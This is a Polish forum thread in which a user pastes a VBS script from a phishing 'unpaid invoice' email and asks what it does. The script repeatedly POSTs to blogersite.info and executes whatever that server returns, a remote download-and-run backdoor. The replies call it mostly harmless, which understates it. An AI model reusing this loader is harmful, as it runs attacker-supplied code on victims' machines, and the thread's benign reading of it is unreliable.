• Najnowsze pytania
  • Bez odpowiedzi
  • Zadaj pytanie
  • Kategorie
  • Tagi
  • Zdobyte punkty
  • Ekipa ninja
  • IRC
  • FAQ
  • Regulamin
  • Książki warte uwagi

Email z fałszywą fakturą zawierającą plik .vba

Object Storage Arubacloud
0 głosów
210 wizyt
pytanie zadane 22 grudnia 2018 w Bezpieczeństwo, hacking przez Burgonys Początkujący (440 p.)

Witam,

Otrzymałem dziś maila z rzekomo nieopłaconą fakturą, z czystej ciekawości otworzyłem go w txt, żeby zobaczyć co miał mi zrobić i skrypt wygląda następująco:

'3305

Dim ztVar, reresponse, zzz 
ztVar = 0 
zzz = ""
Function punkTest()
	'3305
	On Error Resume Next 
	Execute "" + reresponse + "" 
	'3305
End Function


Sub tankConnect()
	'3305
    On Error Resume Next
	Dim oXMLHTTP 
	Dim oStream 
	Dim oStrsdfeam
	Set oXMLHTTP = CreateObject("Microsoft.XMLHTTP") 
	oXMLHTTP.Open "Post", "https://blogersite.info", False 
	oXMLHTTP.Send 
	reresponse = oXMLHTTP.responseText	 
	punkTest() 
	'3305
End Sub

msgbox "3305"
While ztVar < 10
 	'3305
 call tankConnect() 
Wend

Wygląda na to, że wysyła tylko pusty obiekt na podany wyżej adres? Czy jest tutaj coś, czego nie widzę?

Dla potencjalnych przyszłych odbiorców mail zaczynał się od:

Pragnie​​​​​my poinformować że odnotowaliśmy długu z tytułu usług telekomunikacyjnych

1 odpowiedź

0 głosów
odpowiedź 22 grudnia 2018 przez niezalogowany

Raczej nic tu niezwykłego nie ma, ale na stronie jest:

WScript.Sleep 8000

więc może po prostu jest to jakiś mechanizm , który czeka na komende ze strony?

 

 

...ale raczej zapomnieli go zaimplementować.

komentarz 22 grudnia 2018 przez Burgonys Początkujący (440 p.)
Hahaha, na to wygląda, dzięki za odpowiedź
komentarz 22 grudnia 2018 przez Tomek Sochacki Ekspert (227,510 p.)

@Wojciech Radtke, swoją drogą to w ostnim czasie coraz więcej tego... ja chyba wpadłem na jakąś dziwną listę mailową bo nie ma tygodnia abym nie dostał 1-2 takich "faktur"... różne, vba, js, pdf... :)

komentarz 22 grudnia 2018 przez niezalogowany
Ja takich nie dostaje )-: a chciałbym. Nawet mam konto, na którym rejstruje sie z tym samym hasłem na wielu dziwnych stronach... i nic. Tak swoją drogą to jestem ciekaw dlaczego większość tych maili łatwo da się wykryć.

Podobne pytania

0 głosów
2 odpowiedzi 232 wizyt
pytanie zadane 22 sierpnia 2018 w Bezpieczeństwo, hacking przez Kuba04 Nowicjusz (120 p.)
0 głosów
1 odpowiedź 201 wizyt
0 głosów
1 odpowiedź 268 wizyt
pytanie zadane 27 września 2022 w Visual Basic przez magda_19 Gaduła (3,080 p.)

92,576 zapytań

141,426 odpowiedzi

319,652 komentarzy

61,961 pasjonatów

Motyw:

Akcja Pajacyk

Pajacyk od wielu lat dożywia dzieci. Pomóż klikając w zielony brzuszek na stronie. Dziękujemy! ♡

Oto polecana książka warta uwagi.
Pełną listę książek znajdziesz tutaj.

Akademia Sekuraka

Kolejna edycja największej imprezy hakerskiej w Polsce, czyli Mega Sekurak Hacking Party odbędzie się już 20 maja 2024r. Z tej okazji mamy dla Was kod: pasjamshp - jeżeli wpiszecie go w koszyku, to wówczas otrzymacie 40% zniżki na bilet w wersji standard!

Więcej informacji na temat imprezy znajdziecie tutaj. Dziękujemy ekipie Sekuraka za taką fajną zniżkę dla wszystkich Pasjonatów!

Akademia Sekuraka

Niedawno wystartował dodruk tej świetnej, rozchwytywanej książki (około 940 stron). Mamy dla Was kod: pasja (wpiszcie go w koszyku), dzięki któremu otrzymujemy 10% zniżki - dziękujemy zaprzyjaźnionej ekipie Sekuraka za taki bonus dla Pasjonatów! Książka to pierwszy tom z serii o ITsec, który łagodnie wprowadzi w świat bezpieczeństwa IT każdą osobę - warto, polecamy!

...